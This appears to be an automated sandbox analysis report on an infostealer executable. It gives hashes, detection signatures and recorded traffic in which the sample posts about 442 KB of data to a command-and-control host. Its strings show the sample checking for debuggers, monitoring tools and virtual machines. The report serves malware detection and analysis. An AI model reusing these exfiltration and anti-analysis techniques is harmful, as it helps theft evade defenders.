Windows Analysis Report
r8nllkNEQX.exe

Overview

General Information

Sample name: r8nllkNEQX.exe (renamed because original name is a hash value)
Original sample name: 5d07283413428b07167fbcdbb4063558.exe
Analysis ID: 1582706
MD5: 5d07283413428b07167fbcdbb4063558
SHA1: 0d59f6cfd46fd2a6351d26f983dffc495e8630d3
SHA256: 30d0a42cbfa4c3ff9c23fe502c5abfef4910fd3a7997088e6b0ca512b50d53e2
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • r8nllkNEQX.exe (PID: 5572 cmdline: "C:\Users\user\Desktop\r8nllkNEQX.exe" MD5: 5D07283413428B07167FBCDBB4063558)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: r8nllkNEQX.exe | Avira: detected
Source: r8nllkNEQX.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: r8nllkNEQX.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: -----BEGIN PUBLIC KEY----- 0_2_002FDCF0
Source: r8nllkNEQX.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh 0_2_0033A5B0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_0033A7F0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: mov dword ptr [edi+04h], 424D53FFh 0_2_0033A7F0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: mov dword ptr [esi+04h], 424D53FFh 0_2_0033A7F0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_0033B560
Source: r8nllkNEQX.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: global traffic | HTTP traffic detected:
    GET /ip HTTP/1.1
    Host: httpbin.org
    Accept: */*
Source: global traffic | HTTP traffic detected:
    POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
    Host: home.fortth14vs.top
    Accept: */*
    Content-Type: application/json
    Content-Length: 442823
Source: global traffic | HTTP traffic detected:
    GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
    Host: home.fortth14vs.top
    Accept: */*
Source: global traffic | HTTP traffic detected:
    POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
    Host: home.fortth14vs.top
    Accept: */*
    Content-Type: application/json
    Content-Length: 31
    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
    Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0039A8C0 recvfrom
Source: global traffic | HTTP traffic detected:
    GET /ip HTTP/1.1
    Host: httpbin.org
    Accept: */*
Source: global traffic | HTTP traffic detected:
    GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
    Host: home.fortth14vs.top
    Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fortth14vs.top
Source: unknown | HTTP traffic detected:
    POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
    Host: home.fortth14vs.top
    Accept: */*
    Content-Type: application/json
    Content-Length: 442823
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 NOT FOUND
    Server: nginx/1.22.1
    Date: Tue, 31 Dec 2024 08:51:05 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 207
    Connection: close
    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 NOT FOUND
    Server: nginx/1.22.1
    Date: Tue, 31 Dec 2024 08:51:07 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 207
    Connection: close
    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: r8nllkNEQX.exe, 00000000.00000003.1599645314.0000000001593000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600094570.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600044768.00000000015A6000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606989887.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1599729719.00000000015A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZ
Source: r8nllkNEQX.exe, 00000000.00000003.1599645314.0000000001593000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600094570.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600044768.00000000015A6000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606989887.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1599729719.00000000015A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZ(%P
Source: r8nllkNEQX.exe, 00000000.00000003.1600361884.0000000001537000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600313001.0000000001532000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606792210.0000000001539000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
Source: r8nllkNEQX.exe, 00000000.00000003.1600313001.0000000001532000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606792210.0000000001539000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963
Source: r8nllkNEQX.exe, 00000000.00000003.1599691487.0000000001541000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606827806.0000000001544000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: r8nllkNEQX.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: r8nllkNEQX.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: r8nllkNEQX.exe, r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: r8nllkNEQX.exe | String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704

System Summary

Source: r8nllkNEQX.exe | Static PE information: section name:
Source: r8nllkNEQX.exe | Static PE information: section name: .idata
Source: r8nllkNEQX.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002E05B0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002E6FA0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0030F100
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0039B180
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0065E050
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0065A000
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_003A00E0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00336210
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0039C320
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_003A0420
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00624410
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002DE620
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0039C770
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00636730
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0033A7F0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00654780
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0038C900
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002DA960
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002E4940
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_004A6AC0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0058AAC0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00464B60
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0058AB2C
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00648BF0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002DCBB0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0065CC90
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00654D40
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00490D80
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0064CD80
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_005EAE30
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002F4F70
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0039EF90
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00398F90
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00622F90
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002E10E6
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0063D430
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_006435B0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_006617A0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00389880
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00629920
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00653A70
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00641BD0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00311BE0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00637CC0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00589C80
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002E5DB0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002F5EB0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002E3ED0
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: String function: 004ACBC0 appears 90 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: String function: 002D75A0 appears 706 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: String function: 002ECCD0 appears 55 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: String function: 002D73F0 appears 114 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: String function: 003B44A0 appears 76 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: String function: 002DC960 appears 37 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: String function: 003150A0 appears 101 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: String function: 00487220 appears 99 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: String function: 002DCAA0 appears 64 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: String function: 002D71E0 appears 47 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: String function: 00315340 appears 50 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: String function: 002ECD40 appears 80 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: String function: 00314F40 appears 333 times
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: String function: 00314FD0 appears 288 times
Source: r8nllkNEQX.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: r8nllkNEQX.exe | Static PE information: Section: vnoaippe ZLIB complexity 0.9941880097950363
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_002D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: r8nllkNEQX.exe | ReversingLabs: Detection: 55%
Source: r8nllkNEQX.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: r8nllkNEQX.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Section loaded: kernel.appcore.dll
Source: r8nllkNEQX.exe | Static file information: File size 4509696 > 1048576
Source: r8nllkNEQX.exe | Static PE information: Raw size of is bigger than: 0x100000 < 0x289000
Source: r8nllkNEQX.exe | Static PE information: Raw size of vnoaippe is bigger than: 0x100000 < 0x1c0400

Data Obfuscation

Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Unpacked PE file: 0.2.r8nllkNEQX.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vnoaippe:EW;ernybvwg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vnoaippe:EW;ernybvwg:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: r8nllkNEQX.exe | Static PE information: real checksum: 0x451cba should be: 0x453b43
Source: r8nllkNEQX.exe | Static PE information: section name:
Source: r8nllkNEQX.exe | Static PE information: section name: .idata
Source: r8nllkNEQX.exe | Static PE information: section name:
Source: r8nllkNEQX.exe | Static PE information: section name: vnoaippe
Source: r8nllkNEQX.exe | Static PE information: section name: ernybvwg
Source: r8nllkNEQX.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_006541D0 push eax; mov dword ptr [esp], edx 0_2_006541D5
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00352340 push eax; mov dword ptr [esp], 00000000h 0_2_00352343
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0038C7F0 push eax; mov dword ptr [esp], 00000000h 0_2_0038C743
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0032E92D push es; retf 0_2_0032E92E
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00310AC0 push eax; mov dword ptr [esp], 00000000h 0_2_00310AC4
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00331430 push eax; mov dword ptr [esp], 00000000h 0_2_00331433
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_003539A0 push eax; mov dword ptr [esp], 00000000h 0_2_003539A3
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_0032DAD0 push eax; mov dword ptr [esp], edx 0_2_0032DAD1
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Code function: 0_2_00659F40 push dword ptr [eax+04h]; ret 0_2_00659F6F
Source: r8nllkNEQX.exe | Static PE information: section name: vnoaippe entropy: 7.955338665560642

Boot Survival

Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\r8nllkNEQX.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: PROCMON.EXE
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: X64DBG.EXE
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WINDBG.EXE
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE7F91 second address: BE7F96 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE2E02 second address: BE2E0F instructions: 0x00000000 rdtsc 0x00000002 je 00007FFB28DE2A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE4FE3 second address: BE4FED instructions: 0x00000000 rdtsc 0x00000002 js 00007FFB28B7466Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE1E67 second address: BE1E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FFB28DE2A0Ah 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE7F96 second address: BE7FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+12A32BF9h] 0x00000010 push 00000000h 0x00000012 mov ebx, dword ptr [ebp+12A32A99h] 0x00000018 push 00000000h 0x0000001a mov edi, dword ptr [ebp+12A3380Ch] 0x00000020 push eax 0x00000021 je 00007FFB28B7466Eh 0x00000027 push ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE5FA4 second address: BE5FBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE5FBC second address: BE5FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: BE8EA1 second address: BE8EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push edx 0x0000000a mov edi, 4909DD42h 0x0000000f pop edi 0x00000010 push 00000000h 0x00000012 sub bx, A876h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FFB28DE2A08h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 call 00007FFB28DE2A0Dh 0x00000038 mov dword ptr [ebp+12A32508h], edi 0x0000003e pop edi 0x0000003f xchg eax, esi 0x00000040 push eax 0x00000041 push edx 0x00000042 push edx 0x00000043 jc 00007FFB28DE2A06h 0x00000049 pop edx 0x0000004a rdtsc
